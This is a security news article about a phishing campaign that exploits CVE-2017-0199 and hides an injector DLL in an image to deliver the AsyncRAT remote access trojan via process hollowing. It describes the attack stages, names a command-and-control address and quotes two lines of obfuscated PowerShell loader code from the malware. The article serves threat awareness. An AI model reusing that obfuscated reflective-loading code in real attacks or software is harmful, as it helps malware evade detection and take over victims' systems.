Cybersecurity researchers have discovered a sophisticated malware campaign that employs steganography techniques to hide malicious code within seemingly innocent image files.

This attack chain leverages an older Microsoft Office vulnerability (CVE-2017-0199) to ultimately deliver AsyncRAT, a remote access trojan capable of providing attackers with complete control over victim systems.

The attack begins with phishing emails containing malicious Microsoft Office documents designed to exploit CVE-2017-0199, a vulnerability first reported in April 2017.

When opened, these documents trigger the download and execution of a remote HTA script without requiring any user interaction. The HTA script subsequently downloads a trojanized version of the legitimate Windows utility Prnport.vbs.

Upon execution, the compromised Prnport.vbs file constructs and executes a complex PowerShell script that downloads an image file containing hidden malicious code.

This PowerShell script looks innocent at first glance but contains multiple obfuscation techniques designed to evade detection.

Sophos researchers identified this campaign as particularly dangerous due to its multi-stage nature and use of steganography to avoid traditional security controls.

“This attack demonstrates the continuing evolution of threat actors’ techniques,” noted a Sophos analyst examining the campaign.

“By hiding malicious code within ordinary images, attackers can bypass many security solutions that don’t inspect image files for executable content.”

Campaign flow

The most innovative aspect of this attack involves the steganography technique used to hide the malicious injector DLL within a seemingly harmless image file.

When the victim opens the compromised image, they see only an ordinary photograph, unaware that malicious code is hidden inside.

The PowerShell script extracts this concealed code by locating specific Base64 markers (> and >) within the image’s data.

The extracted code reveals a DLL named “Microsoft.Win32.TaskScheduler” that employs process hollowing techniques to inject the AsyncRAT payload into a legitimate MSBuild process.

This technique allows the malware to operate under the guise of a trusted Windows process, making detection significantly more difficult.

$injectorReflection = [Reflection.Assembly]::('Lo' + 'ad')($decodedInjector);
$executeMethod = [dnlib.IO.Home].('GetM' + 'ethod')('VAI').('Inv' + 'oke')($null, @($finalPayloadURL, $null, $null, $null, "MsBuild"))

The final payload, AsyncRAT, communicates with command and control servers at 148.113.214.176:7878.

This open-source remote access tool provides attackers with extensive capabilities including remote desktop access, keylogging, and the ability to deploy additional malware including ransomware.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy